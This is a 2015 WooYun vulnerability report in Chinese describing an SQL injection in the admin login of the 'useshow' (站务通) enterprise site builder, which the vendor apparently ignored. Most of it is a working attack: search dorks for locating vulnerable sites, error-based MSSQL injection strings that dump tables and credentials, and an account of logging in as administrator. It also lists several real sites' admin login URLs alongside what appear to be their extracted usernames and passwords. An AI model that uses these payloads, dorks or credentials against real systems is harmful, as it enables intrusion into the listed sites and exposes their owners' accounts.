当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094868

漏洞标题:某企业建站系统通用型POST注入

相关厂商:苏州天颂计算机技术服务有限公司

漏洞作者: 0x 80

提交时间:2015-02-05 10:46

修复时间:2015-03-22 10:48

公开时间:2015-03-22 10:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通用型POST注入

详细说明:

三种方式能搜索到,影响部分企业公司网站
百度:本站由站务通提供动力支持

57889.png


Powered by useshow.
谷歌:本站由站务通提供动力支持 Powered by useshow.
本想用BURP的,算了,就用手工,准确点

798.png


7890.png


=====================================

--.png


漏洞证明:

开始案例,存在的案例还是很多的。小部分不能POST

780.png


1,先拿他做个试验
站务通代理平台

78905.png


http://agent.useshow.com/
输入:

' having 1=1--

' having 1=1--


890.png


777.png


这么多表名出来了
列 'member_message.id' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.mlogin' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.mpwd' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.mpurview' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.mdefaultpwd' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.ex' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
列 'member_message.dotime' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。
========================================
我就拿1个案例来演示下
http://www.ahfdyy.com/ConstructASP/Admin/Login.aspx
表几乎都是一样的。 ,我测试过
表名:vip_userInfo
字段:password

1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),1) from vip_userInfo)) and '1'='1


将 nvarchar 值 'id' 转换为数据类型为 int 的列时发生语法错误。

1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),2) from vip_userInfo)) and '1'='1


将 nvarchar 值 'vipCode' 转换为数据类型为 int 的列时发生语法错误。
1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),3) from vip_userInfo)) and '1'='1
将 nvarchar 值 'nickname' 转换为数据类型为 int 的列时发生语法错误
爆密码:' and (select top 1 vip_userInfo.password from vip_userInfo)>0--

680.png


' and (select top 1 vip_userInfo.nickname from vip_userInfo)>0--
将 nvarchar 值 '管理员' 转换为数据类型为 int 的列时发生语法错误。
' and (select top 1 vip_userInfo.vipcode from vip_userInfo)>0--
将 varchar 值 'ahfdyycom' 转换为数据类型为 int 的列时发生语法错误。
用户名ahfdyycom
密码fdyy888
登录看看,。看看对不

6807.png


进去了。。成功登录

7890-.png


管理员权限。
再贴几个可以POST的,具体就不一一测试了
知道了这些细节,直接对登录口,就可以测试了
直接输入爆用户,密码的语句
经过试验
爆通用的用户:' and (select top 1 vip_userInfo.vipcode from vip_userInfo)>0--
爆通用的密码:' and (select top 1 vip_userInfo.password from vip_userInfo)>0--
查看密码即可
存在POST注入的站:
http://www.sz-wb.com/ConstructASP/Admin/Login.aspx
用户:szwbcom
密码:gsw0612ljn102380

6890-.png


====================================================
http://www.ahhssm.com/ConstructASP/Admin/Login.aspx
用户:ahhssmcom
密码;HS110528

7563.png


===================================================
http://www.wuhutw.com/ConstructASP/Admin/Login.aspx

790-.png


用户:将 varchar 值 'wuhutwcom' 转换为数据类型为 int 的列时发生语法错误。
密码:将 varchar 值 'tw0377' 转换为数据类型为 int 的列时发生语法错误。

775.png


============================================
http://handfoot120.com/ConstructASP/Admin/Login.aspx
用户:将 varchar 值 'handfoot120com' 转换为数据类型为 int 的列时发生语法错误。
将 varchar 值 'a18907028210' 转换为数据类型为 int 的列时发生语法错误。

7200.png


================================================

http://www.hfzksy.com/ConstructASP/Admin/Login.aspx


用户将 varchar 值 'hfzksycom' 转换为数据类型为 int 的列时发生语法错误。
密码:将 varchar 值 'allan1416' 转换为数据类型为 int 的列时发生语法错误。

6790.png


=============================================
http://www.nssold.com/ConstructASP/Admin/Login.aspx
将 varchar 值 'nssoldcom' 转换为数据类型为 int 的列时发生语法错误。
varchar 值 '15055310566' 的转换溢出了 int 列。超出了最大整数值。

667.png


============================================
就不一一测试了!!!

修复方案:

修复注入参数

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝